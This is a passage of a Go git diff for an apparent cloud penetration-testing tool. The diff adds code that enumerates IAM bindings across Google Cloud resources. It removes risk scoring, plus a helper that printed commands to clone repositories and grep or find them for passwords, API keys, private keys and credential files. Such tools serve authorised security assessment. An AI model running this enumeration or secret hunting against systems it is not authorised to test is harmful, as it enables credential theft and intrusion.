client.Bucket(bucketAttrs.Name) + policy, err := bucket.IAM().Policy(ctx) + if err != nil { + continue + } + + // Convert policy to bindings + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "bucket", + ResourceName: fmt.Sprintf("gs://%s", bucketAttrs.Name), + ResourceID: bucketAttrs.Name, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetBigQueryDatasetIAM enumerates IAM policies on BigQuery datasets +func (s *ResourceIAMService) GetBigQueryDatasetIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *bigquery.Client + var err error + if s.session != nil { + client, err = bigquery.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + defer client.Close() + + // List datasets + it := client.Datasets(ctx) + for { + dataset, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get metadata which includes access entries (IAM-like) + meta, err := dataset.Metadata(ctx) + if err != nil { + continue + } + + // BigQuery uses Access entries instead of IAM policies + for _, access := range meta.Access { + member := access.Entity + entityTypeStr := fmt.Sprintf("%v", access.EntityType) + + // Determine member type and if public based on entity type + isPublic := false + memberType := entityTypeStr + + switch access.EntityType { + case bigquery.UserEmailEntity: + memberType = "User" + member = "user:" + access.Entity + case bigquery.GroupEmailEntity: + memberType = "Group" + member = "group:" + access.Entity + case bigquery.DomainEntity: + memberType = "Domain" + member = "domain:" + access.Entity + case bigquery.SpecialGroupEntity: + // Special groups include allAuthenticatedUsers + if access.Entity == "allAuthenticatedUsers" { + memberType = "allAuthenticatedUsers" + member = "allAuthenticatedUsers" + isPublic = true + } else { + memberType = "SpecialGroup" + } + case bigquery.IAMMemberEntity: + memberType = determineMemberType(access.Entity) + isPublic = isPublicMember(access.Entity) + } + + if member == "" { + continue + } + + binding := ResourceIAMBinding{ + ResourceType: "dataset", + ResourceName: fmt.Sprintf("%s.%s", projectID, dataset.DatasetID), + ResourceID: dataset.DatasetID, + ProjectID: projectID, + Role: string(access.Role), + Member: member, + MemberType: memberType, + MemberEmail: extractEmail(member), + IsPublic: isPublic, + } + bindings = append(bindings, binding) + } + } + + return bindings, nil +} + +// GetPubSubIAM enumerates IAM policies on Pub/Sub topics and subscriptions +func (s *ResourceIAMService) GetPubSubIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *pubsub.Client + var err error + if s.session != nil { + client, err = pubsub.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = pubsub.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + defer client.Close() + + // List topics + topicIt := client.Topics(ctx) + for { + topic, err := topicIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this topic + policy, err := topic.IAM().Policy(ctx) + if err != nil { + continue + } + + topicID := topic.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "topic", + ResourceName: fmt.Sprintf("projects/%s/topics/%s", projectID, topicID), + ResourceID: topicID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + // List subscriptions + subIt := client.Subscriptions(ctx) + for { + sub, err := subIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this subscription + policy, err := sub.IAM().Policy(ctx) + if err != nil { + continue + } + + subID := sub.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "subscription", + ResourceName: fmt.Sprintf("projects/%s/subscriptions/%s", projectID, subID), + ResourceID: subID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetSecretManagerIAM enumerates IAM policies on Secret Manager secrets +func (s *ResourceIAMService) GetSecretManagerIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var smService *secretmanager.Service + var err error + if s.session != nil { + smService, err = secretmanager.NewService(ctx, s.getClientOption()) + } else { + smService, err = secretmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + // List secrets + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := smService.Projects.Secrets.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + for _, secret := range resp.Secrets { + // Get IAM policy for this secret + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Context(ctx).Do() + if err != nil { + continue + } + + secretID := extractSecretID(secret.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "secret", + ResourceName: secret.Name, + ResourceID: secretID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetKMSIAM enumerates IAM policies on KMS keys +func (s *ResourceIAMService) GetKMSIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *kms.KeyManagementClient + var err error + if s.session != nil { + client, err = kms.NewKeyManagementClient(ctx, s.getClientOption()) + } else { + client, err = kms.NewKeyManagementClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + defer client.Close() + + // List key rings in all locations + locations := []string{"global", "us", "us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + + keyRingIt := client.ListKeyRings(ctx, &kmspb.ListKeyRingsRequest{Parent: parent}) + for { + keyRing, err := keyRingIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // List keys in this key ring + keyIt := client.ListCryptoKeys(ctx, &kmspb.ListCryptoKeysRequest{Parent: keyRing.Name}) + for { + key, err := keyIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this key + policy, err := client.ResourceIAM(key.Name).Policy(ctx) + if err != nil { + continue + } + + keyID := extractKeyID(key.Name) + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "cryptoKey", + ResourceName: key.Name, + ResourceID: keyID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + } + } + + return bindings, nil +} + +// GetCloudFunctionsIAM enumerates IAM policies on Cloud Functions +func (s *ResourceIAMService) GetCloudFunctionsIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var cfService *cloudfunctions.Service + var err error + if s.session != nil { + cfService, err = cloudfunctions.NewService(ctx, s.getClientOption()) + } else { + cfService, err = cloudfunctions.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := cfService.Projects.Locations.Functions.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + for _, fn := range resp.Functions { + // Get IAM policy for this function + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Context(ctx).Do() + if err != nil { + continue + } + + fnID := extractFunctionID(fn.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "function", + ResourceName: fn.Name, + ResourceID: fnID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetCloudRunIAM enumerates IAM policies on Cloud Run services +func (s *ResourceIAMService) GetCloudRunIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var runService *run.APIService + var err error + if s.session != nil { + runService, err = run.NewService(ctx, s.getClientOption()) + } else { + runService, err = run.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + for _, svc := range resp.Items { + // Get IAM policy for this service + policy, err := runService.Projects.Locations.Services.GetIamPolicy(svc.Metadata.Name).Context(ctx).Do() + if err != nil { + continue + } + + svcID := svc.Metadata.Name + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "cloudrun", + ResourceName: svc.Metadata.Name, + ResourceID: svcID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// Helper functions + +func determineMemberType(member string) string { + switch { + case member == "allUsers": + return "allUsers" + case member == "allAuthenticatedUsers": + return "allAuthenticatedUsers" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "principal:"): + return "Federated" + case strings.HasPrefix(member, "principalSet:"): + return "FederatedSet" + default: + return "Unknown" + } +} + +func extractEmail(member string) string { + if strings.Contains(member, ":") { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + } + return member +} + +func isPublicMember(member string) bool { + return member == "allUsers" || member == "allAuthenticatedUsers" +} + +func extractSecretID(name string) string { + // Format: projects/{project}/secrets/{secret} + parts := strings.Split(name, "/") + if len(parts) >= 4 { + return parts[len(parts)-1] + } + return name +} + +func extractKeyID(name string) string { + // Format: projects/{project}/locations/{location}/keyRings/{keyring}/cryptoKeys/{key} + parts := strings.Split(name, "/") + if len(parts) >= 8 { + return parts[len(parts)-1] + } + return name +} + +func extractFunctionID(name string) string { + // Format: projects/{project}/locations/{location}/functions/{function} + parts := strings.Split(name, "/") + if len(parts) >= 6 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go index 363c1faf..1288d029 100644 --- a/gcp/services/serviceAgentsService/serviceAgentsService.go +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -17,15 +17,13 @@ func New() *ServiceAgentsService { // ServiceAgentInfo represents a Google-managed service agent type ServiceAgentInfo struct { - Email string `json:"email"` - ProjectID string `json:"projectId"` - ServiceName string `json:"serviceName"` - AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. - Roles []string `json:"roles"` - IsCrossProject bool `json:"isCrossProject"` - Description string `json:"description"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Email string `json:"email"` + ProjectID string `json:"projectId"` + ServiceName string `json:"serviceName"` + AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. + Roles []string `json:"roles"` + IsCrossProject bool `json:"isCrossProject"` + Description string `json:"description"` } // KnownServiceAgents maps service agent patterns to their descriptions @@ -155,16 +153,14 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen Roles: []string{binding.Role}, IsCrossProject: isCrossProject, Description: description, - RiskReasons: []string{}, } seenAgents[email] = agent } } } - // Convert to slice and analyze risk + // Convert to slice for _, agent := range seenAgents { - agent.RiskLevel, agent.RiskReasons = s.analyzeAgentRisk(agent) agents = append(agents, *agent) } @@ -205,55 +201,6 @@ func (s *ServiceAgentsService) identifyServiceAgent(email string) (string, strin return "", "" } -func (s *ServiceAgentsService) analyzeAgentRisk(agent *ServiceAgentInfo) (string, []string) { - var reasons []string - score := 0 - - // Cross-project access is notable - if agent.IsCrossProject { - reasons = append(reasons, "Cross-project service agent (from different project)") - score += 1 - } - - // Check for powerful roles - for _, role := range agent.Roles { - if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { - reasons = append(reasons, fmt.Sprintf("Has admin role: %s", role)) - score += 2 - } - if role == "roles/owner" || role == "roles/editor" { - reasons = append(reasons, fmt.Sprintf("Has privileged role: %s", role)) - score += 2 - } - if strings.Contains(role, "iam.serviceAccountUser") || - strings.Contains(role, "iam.serviceAccountTokenCreator") { - reasons = append(reasons, fmt.Sprintf("Can impersonate service accounts: %s", role)) - score += 2 - } - } - - // Check for many roles - if len(agent.Roles) > 5 { - reasons = append(reasons, fmt.Sprintf("Has many roles (%d)", len(agent.Roles))) - score += 1 - } - - // Service-specific risks - if agent.ServiceName == "Cloud Build" { - reasons = append(reasons, "Cloud Build SA - often has broad permissions for CI/CD") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - // GetDefaultServiceAccounts returns the default service accounts for a project func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, projectNumber string) []ServiceAgentInfo { var defaults []ServiceAgentInfo @@ -265,8 +212,6 @@ func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, proje ServiceName: "Google APIs", AgentType: "Google APIs", Description: "Google APIs Service Agent - automatically created, manages resources on behalf of Google Cloud services", - RiskReasons: []string{"Automatically created with broad permissions"}, - RiskLevel: "INFO", }) // Compute Engine default SA @@ -276,8 +221,6 @@ func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, proje ServiceName: "Compute Engine", AgentType: "Compute Engine", Description: "Default Compute Engine service account - used by instances without explicit SA", - RiskReasons: []string{"Default SA often has Editor role - overprivileged"}, - RiskLevel: "MEDIUM", }) // App Engine default SA @@ -287,8 +230,6 @@ func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, proje ServiceName: "App Engine", AgentType: "App Engine", Description: "App Engine default service account", - RiskReasons: []string{"Default SA often has Editor role"}, - RiskLevel: "MEDIUM", }) return defaults diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go index 5efa078f..7d2b7f31 100644 --- a/gcp/services/sourceReposService/sourceReposService.go +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -17,16 +17,20 @@ func New() *SourceReposService { // RepoInfo represents a Cloud Source Repository type RepoInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - URL string `json:"url"` - Size int64 `json:"size"` - MirrorConfig bool `json:"mirrorConfig"` - MirrorURL string `json:"mirrorUrl"` - PubsubConfigs int `json:"pubsubConfigs"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - CloneCommands []string `json:"cloneCommands"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + URL string `json:"url"` + Size int64 `json:"size"` + MirrorConfig bool `json:"mirrorConfig"` + MirrorURL string `json:"mirrorUrl"` + PubsubConfigs int `json:"pubsubConfigs"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` } // ListRepos retrieves all Cloud Source Repositories in a project @@ -47,12 +51,39 @@ func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { for _, repo := range resp.Repos { info := s.parseRepo(repo, projectID) + + // Get IAM policy for this repo + iamBindings := s.getRepoIAMBindings(service, repo.Name) + info.IAMBindings = iamBindings + repos = append(repos, info) } return repos, nil } +// getRepoIAMBindings retrieves IAM bindings for a repository +func (s *SourceReposService) getRepoIAMBindings(service *sourcerepo.Service, repoName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Repos.GetIamPolicy(repoName).OptionsRequestedPolicyVersion(3).Do() + if err != nil { + // Silently skip if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) RepoInfo { // Extract repo name from full path name := repo.Name @@ -62,11 +93,10 @@ func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) } info := RepoInfo{ - Name: name, - ProjectID: projectID, - URL: repo.Url, - Size: repo.Size, - RiskReasons: []string{}, + Name: name, + ProjectID: projectID, + URL: repo.Url, + Size: repo.Size, } // Check for mirror configuration @@ -80,63 +110,6 @@ func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) info.PubsubConfigs = len(repo.PubsubConfigs) } - // Generate clone commands - info.CloneCommands = s.generateCloneCommands(info, projectID) - - // Analyze risk - info.RiskLevel, info.RiskReasons = s.analyzeRepoRisk(info) - return info } -func (s *SourceReposService) generateCloneCommands(repo RepoInfo, projectID string) []string { - var commands []string - - // Standard gcloud clone - commands = append(commands, - fmt.Sprintf("# Clone repository:\ngcloud source repos clone %s --project=%s", repo.Name, projectID)) - - // Git clone with credential helper - commands = append(commands, - fmt.Sprintf("# Or with git directly:\ngit config credential.helper gcloud.sh && git clone %s", repo.URL)) - - // Search for secrets after clone - commands = append(commands, - fmt.Sprintf("# Search for secrets in cloned repo:\ncd %s && grep -rE '(password|secret|api_key|private_key|AWS_|GOOGLE_)' .", repo.Name), - fmt.Sprintf("# Search for credential files:\nfind %s -name '*.pem' -o -name '*.key' -o -name '.env' -o -name 'credentials*'", repo.Name)) - - return commands -} - -func (s *SourceReposService) analyzeRepoRisk(repo RepoInfo) (string, []string) { - var reasons []string - score := 0 - - // Large repos might contain more sensitive data - if repo.Size > 100*1024*1024 { // > 100MB - reasons = append(reasons, "Large repository (>100MB) - may contain significant code/data") - score += 1 - } - - // Mirror repos might sync from external sources - if repo.MirrorConfig { - reasons = append(reasons, fmt.Sprintf("Mirrors external repo: %s", repo.MirrorURL)) - score += 1 - } - - // Has pubsub triggers (may contain deploy configs) - if repo.PubsubConfigs > 0 { - reasons = append(reasons, fmt.Sprintf("Has %d Pub/Sub trigger(s) - may be CI/CD source", repo.PubsubConfigs)) - score += 1 - } - - // All repos are potentially valuable - reasons = append(reasons, "Source code may contain credentials, API keys, or secrets") - - if score >= 2 { - return "HIGH", reasons - } else if score >= 1 { - return "MEDIUM", reasons - } - return "LOW", reasons -} diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go index 0e3b2457..db8e12b0 100644 --- a/gcp/services/spannerService/spannerService.go +++ b/gcp/services/spannerService/spannerService.go @@ -17,24 +17,52 @@ func New() *SpannerService { return &SpannerService{} } +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + type SpannerInstanceInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - DisplayName string `json:"displayName"` - Config string `json:"config"` - NodeCount int64 `json:"nodeCount"` - State string `json:"state"` - Databases []string `json:"databases"` + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Config string `json:"config"` + NodeCount int64 `json:"nodeCount"` + State string `json:"state"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerDatabaseInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + InstanceName string `json:"instanceName"` + State string `json:"state"` + EncryptionType string `json:"encryptionType"` + KmsKeyName string `json:"kmsKeyName"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerResult struct { + Instances []SpannerInstanceInfo + Databases []SpannerDatabaseInfo } -func (s *SpannerService) ListInstances(projectID string) ([]SpannerInstanceInfo, error) { +// ListInstancesAndDatabases retrieves all Spanner instances and databases with IAM bindings +func (s *SpannerService) ListInstancesAndDatabases(projectID string) (*SpannerResult, error) { ctx := context.Background() service, err := spanner.NewService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") } - var instances []SpannerInstanceInfo + result := &SpannerResult{ + Instances: []SpannerInstanceInfo{}, + Databases: []SpannerDatabaseInfo{}, + } + parent := fmt.Sprintf("projects/%s", projectID) req := service.Projects.Instances.List(parent) @@ -42,37 +70,106 @@ func (s *SpannerService) ListInstances(projectID string) ([]SpannerInstanceInfo, for _, instance := range page.Instances { info := SpannerInstanceInfo{ Name: extractName(instance.Name), + FullName: instance.Name, ProjectID: projectID, DisplayName: instance.DisplayName, - Config: instance.Config, + Config: extractName(instance.Config), NodeCount: instance.NodeCount, State: instance.State, } - // Get databases for this instance - dbs, _ := s.listDatabases(service, ctx, instance.Name) - info.Databases = dbs + // Get IAM bindings for this instance + info.IAMBindings = s.getInstanceIAMBindings(service, ctx, instance.Name) + + result.Instances = append(result.Instances, info) - instances = append(instances, info) + // Get databases for this instance + databases := s.listDatabases(service, ctx, instance.Name, projectID) + result.Databases = append(result.Databases, databases...) } return nil }) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return result, nil +} + +// getInstanceIAMBindings retrieves IAM bindings for an instance +func (s *SpannerService) getInstanceIAMBindings(service *spanner.Service, ctx context.Context, instanceName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.GetIamPolicy(instanceName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } } - return instances, nil + + return bindings } -func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Context, instanceName string) ([]string, error) { - var databases []string +// listDatabases retrieves all databases for an instance with their IAM bindings +func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Context, instanceName string, projectID string) []SpannerDatabaseInfo { + var databases []SpannerDatabaseInfo + req := service.Projects.Instances.Databases.List(instanceName) - err := req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { + _ = req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { for _, db := range page.Databases { - databases = append(databases, extractName(db.Name)) + dbInfo := SpannerDatabaseInfo{ + Name: extractName(db.Name), + FullName: db.Name, + ProjectID: projectID, + InstanceName: extractName(instanceName), + State: db.State, + } + + // Determine encryption type + if db.EncryptionConfig != nil && db.EncryptionConfig.KmsKeyName != "" { + dbInfo.EncryptionType = "CMEK" + dbInfo.KmsKeyName = db.EncryptionConfig.KmsKeyName + } else { + dbInfo.EncryptionType = "Google-managed" + } + + // Get IAM bindings for this database + dbInfo.IAMBindings = s.getDatabaseIAMBindings(service, ctx, db.Name) + + databases = append(databases, dbInfo) } return nil }) - return databases, err + + return databases +} + +// getDatabaseIAMBindings retrieves IAM bindings for a database +func (s *SpannerService) getDatabaseIAMBindings(service *spanner.Service, ctx context.Context, databaseName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.Databases.GetIamPolicy(databaseName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings } func extractName(fullName string) string { diff --git a/gcp/services/sshOsLoginService/sshOsLoginService.go b/gcp/services/sshOsLoginService/sshOsLoginService.go deleted file mode 100644 index 4a194024..00000000 --- a/gcp/services/sshOsLoginService/sshOsLoginService.go +++ /dev/null @@ -1,378 +0,0 @@ -package sshosloginservice - -import ( - "context" - "fmt" - "strings" - - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - compute "google.golang.org/api/compute/v1" - oslogin "google.golang.org/api/oslogin/v1" -) - -type SSHOsLoginService struct{} - -func New() *SSHOsLoginService { - return &SSHOsLoginService{} -} - -// OSLoginConfig represents the OS Login configuration for a project -type OSLoginConfig struct { - ProjectID string `json:"projectId"` - OSLoginEnabled bool `json:"osLoginEnabled"` - OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` - BlockProjectSSHKeys bool `json:"blockProjectSSHKeys"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` -} - -// SSHKeyInfo represents an SSH key in project or instance metadata -type SSHKeyInfo struct { - ProjectID string `json:"projectId"` - Username string `json:"username"` - KeyType string `json:"keyType"` // ssh-rsa, ssh-ed25519, etc. - KeyFingerprint string `json:"keyFingerprint"` - Source string `json:"source"` // project, instance - InstanceName string `json:"instanceName"` // If from instance metadata - Zone string `json:"zone"` - ExploitCommands []string `json:"exploitCommands"` -} - -// InstanceSSHAccess represents SSH access info for an instance -type InstanceSSHAccess struct { - InstanceName string `json:"instanceName"` - ProjectID string `json:"projectId"` - Zone string `json:"zone"` - ExternalIP string `json:"externalIP"` - InternalIP string `json:"internalIP"` - OSLoginEnabled bool `json:"osLoginEnabled"` - BlockProjectKeys bool `json:"blockProjectKeys"` - SSHKeysCount int `json:"sshKeysCount"` - ServiceAccount string `json:"serviceAccount"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - SSHCommands []string `json:"sshCommands"` -} - -// OSLoginUser represents a user with OS Login access -type OSLoginUser struct { - Email string `json:"email"` - ProjectID string `json:"projectId"` - PosixAccounts []string `json:"posixAccounts"` - SSHPublicKeys int `json:"sshPublicKeys"` - CanSSH bool `json:"canSSH"` - CanSudo bool `json:"canSudo"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` -} - -// GetProjectOSLoginConfig retrieves OS Login configuration for a project -func (s *SSHOsLoginService) GetProjectOSLoginConfig(projectID string) (*OSLoginConfig, error) { - ctx := context.Background() - service, err := compute.NewService(ctx) - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") - } - - config := &OSLoginConfig{ - ProjectID: projectID, - RiskReasons: []string{}, - } - - project, err := service.Projects.Get(projectID).Context(ctx).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") - } - - // Check common instance metadata - if project.CommonInstanceMetadata != nil { - for _, item := range project.CommonInstanceMetadata.Items { - switch item.Key { - case "enable-oslogin": - if item.Value != nil && strings.ToLower(*item.Value) == "true" { - config.OSLoginEnabled = true - } - case "enable-oslogin-2fa": - if item.Value != nil && strings.ToLower(*item.Value) == "true" { - config.OSLogin2FAEnabled = true - } - case "block-project-ssh-keys": - if item.Value != nil && strings.ToLower(*item.Value) == "true" { - config.BlockProjectSSHKeys = true - } - } - } - } - - // Analyze risk - config.RiskLevel, config.RiskReasons = s.analyzeOSLoginRisk(config) - - return config, nil -} - -// GetProjectSSHKeys retrieves SSH keys from project metadata -func (s *SSHOsLoginService) GetProjectSSHKeys(projectID string) ([]SSHKeyInfo, error) { - ctx := context.Background() - service, err := compute.NewService(ctx) - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") - } - - var keys []SSHKeyInfo - - project, err := service.Projects.Get(projectID).Context(ctx).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") - } - - if project.CommonInstanceMetadata != nil { - for _, item := range project.CommonInstanceMetadata.Items { - if item.Key == "ssh-keys" && item.Value != nil { - parsedKeys := s.parseSSHKeys(*item.Value, projectID, "project", "", "") - keys = append(keys, parsedKeys...) - } - } - } - - return keys, nil -} - -// GetInstanceSSHAccess retrieves SSH access information for all instances -func (s *SSHOsLoginService) GetInstanceSSHAccess(projectID string) ([]InstanceSSHAccess, []SSHKeyInfo, error) { - ctx := context.Background() - service, err := compute.NewService(ctx) - if err != nil { - return nil, nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") - } - - var instances []InstanceSSHAccess - var instanceKeys []SSHKeyInfo - - req := service.Instances.AggregatedList(projectID) - err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { - for zone, scopedList := range page.Items { - zoneName := zone - if strings.HasPrefix(zone, "zones/") { - zoneName = strings.TrimPrefix(zone, "zones/") - } - - for _, instance := range scopedList.Instances { - access := InstanceSSHAccess{ - InstanceName: instance.Name, - ProjectID: projectID, - Zone: zoneName, - RiskReasons: []string{}, - SSHCommands: []string{}, - } - - // Get IPs - for _, nic := range instance.NetworkInterfaces { - if access.InternalIP == "" { - access.InternalIP = nic.NetworkIP - } - for _, accessConfig := range nic.AccessConfigs { - if accessConfig.NatIP != "" { - access.ExternalIP = accessConfig.NatIP - } - } - } - - // Get service account - if len(instance.ServiceAccounts) > 0 { - access.ServiceAccount = instance.ServiceAccounts[0].Email - } - - // Check instance metadata - if instance.Metadata != nil { - for _, item := range instance.Metadata.Items { - switch item.Key { - case "enable-oslogin": - if item.Value != nil && strings.ToLower(*item.Value) == 